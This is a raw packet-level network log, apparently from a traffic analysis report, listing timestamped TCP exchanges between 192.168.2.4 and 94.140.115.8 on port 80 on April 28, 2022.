                            Apr 28, 2022 15:47:51.073555946 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.084990025 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.085028887 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.085057974 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.085151911 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.085184097 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.086232901 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.086258888 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.086276054 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.086293936 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.086304903 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.086323023 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.086332083 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.086348057 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.086375952 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.086441994 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.086514950 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.086533070 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.086550951 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.086579084 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.086615086 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.101583004 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.101609945 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.101629019 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.101737976 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.155438900 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.155518055 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.155563116 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.155654907 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.155695915 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.157845974 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.157887936 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.157929897 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.157968998 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.157987118 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.158023119 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.158046007 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.158085108 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.158109903 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.158138990 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.158198118 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.158238888 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.158257961 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.158304930 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.158318996 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.158364058 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.161838055 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.161948919 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.180875063 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.180948973 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.180983067 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.181211948 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.238802910 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.238836050 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.238859892 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.238882065 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.238904953 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.238926888 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.238984108 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.239007950 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.241864920 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.241888046 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.241908073 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.241952896 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.241969109 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.241991043 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.242043972 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.242093086 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.337693930 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.413091898 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747339010 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747370958 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747390032 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747409105 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747426987 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747445107 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747459888 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747492075 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.747548103 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.747670889 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747692108 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747710943 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747725010 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.747736931 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.747785091 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.808720112 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.808751106 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.808767080 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.808779001 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.808840036 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809001923 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809202909 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809248924 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809267044 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809276104 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809293032 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809318066 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809335947 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809349060 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809375048 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809387922 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809395075 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809423923 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809442997 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809617043 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809634924 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809676886 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809689045 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809704065 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809716940 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809762001 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.866056919 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866080999 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866096973 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866113901 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866131067 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866147041 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866162062 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866179943 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.866199017 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866214991 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866234064 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866246939 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866359949 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.931590080 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931619883 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931638002 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931655884 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931673050 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931680918 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.931690931 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.931713104 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931727886 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931740999 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931751013 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.931768894 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931777000 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.931792021 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.931830883 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.931849003 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931862116 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931893110 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.931915045 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.932434082 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.932461977 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.932478905 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.932492018 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.932503939 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.932519913 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.932533026 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.010667086 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010694981 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010711908 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010724068 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010757923 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010773897 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010795116 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010802984 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.010873079 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.010876894 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.010909081 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010927916 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010948896 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010955095 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.010967016 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.010982037 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010988951 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.011018991 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.011085033 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.011101961 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.011113882 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.011121988 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.011135101 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.011168957 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.093393087 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093420029 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093436956 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093453884 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093466043 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.093488932 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093494892 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.093512058 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093524933 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093542099 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.093575954 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.093594074 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093611002 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093628883 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093638897 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.093657017 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093674898 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.093683004 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093699932 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093710899 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.093719959 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093744993 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.093777895 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.116108894 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.116137028 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.116154909 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.116170883 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.116188049 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.116200924 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.116219997 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.116228104 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.116240025 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.116272926 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.116295099 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.117630959 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.117651939 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.117667913 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.117679119 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.117718935 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.117760897 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.163832903 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.163858891 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.163877010 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.163888931 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.163938046 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.164000034 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.165623903 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.165654898 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.165673018 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.165690899 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.165698051 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.165710926 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.165747881 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.179863930 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.179893970 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.179910898 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.179923058 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.179994106 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.180036068 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.205565929 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.205585957 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.205646038 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.205657005 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.205670118 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.205689907 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.205727100 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.208410978 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.208431959 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.208477974 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.208491087 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.208518982 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.208554029 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.222927094 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.222948074 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.222965002 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.222979069 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.223001003 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.223041058 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.260257006 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.260283947 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.260302067 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.260313988 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.260402918 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.260504961 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.265027046 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.265050888 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.265068054 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.265079021 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.265191078 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.265224934 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.280093908 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.280116081 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.280132055 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.280139923 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.280240059 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.281203985 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.323599100 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.323626995 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.323645115 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.323662043 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.323681116 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.323692083 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.323709011 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.323719978 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.323734045 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.323751926 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.323772907 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.327682972 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.327706099 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.327723980 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.327734947 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.327764988 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.327784061 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.341161966 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.341193914 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.341212034 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.341224909 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.341249943 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.341285944 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.371115923 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.371141911 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.371157885 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.371170998 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.371213913 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.371228933 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.372364044 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.372385979 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.372402906 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.372437954 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.372452021 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.372486115 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.373045921 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.373097897 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.373112917 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.373126030 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.373141050 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.373167038 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.373192072 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.413743973 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.413769960 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.413786888 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.413800001 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.413907051 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.414437056 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.414457083 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.414474010 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.414485931 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.414526939 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.414572001 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.417244911 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.417268991 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.417325020 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.417385101 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.417397976 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.417429924 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.417474985 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.429986954 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.430010080 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.430028915 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.430041075 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.430078030 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.430104971 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.454997063 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.455024004 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.455044031 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.455060005 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.455097914 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.455121040 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.456686020 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.456712008 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.456727982 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.456736088 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.456782103 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.456810951 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.457371950 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.457391977 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.457433939 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.457442045 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.457453966 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.457477093 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.457499027 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.470495939 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.470524073 CEST804975994.140.115.8192.168.2.4
